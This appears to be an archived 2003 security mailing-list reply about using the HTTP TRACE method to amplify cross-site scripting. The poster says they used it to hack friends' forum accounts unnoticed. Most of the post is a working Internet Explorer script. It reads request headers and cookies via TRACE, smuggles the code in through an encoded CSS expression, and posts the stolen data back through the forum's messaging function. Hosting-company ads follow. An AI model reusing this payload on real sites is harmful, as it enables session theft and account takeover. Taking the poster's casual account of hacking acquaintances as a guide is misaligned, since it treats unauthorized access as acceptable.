Re: TRACE used to increase the dangerous of XSS.

It's really a terrible security hole. Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

  var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bbs.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailmessage&userid=11111&subject=test&message=\" + xmlDoc)\;";

  var target = "http://bbs.for.bar";

  cExampleCode = encodeURIComponent(exampleCode + ';top.close()');   var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';   showModalDialog(target, null, readyCode); }
</script>

<script>

xssDomainTraceRequest();
</script>

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Chen haiyan, CISSP
System Security Engineer
HENAN CFONLINE COMMERCE CO., LTD. Received on Thu Jan 23 23:05:16 2003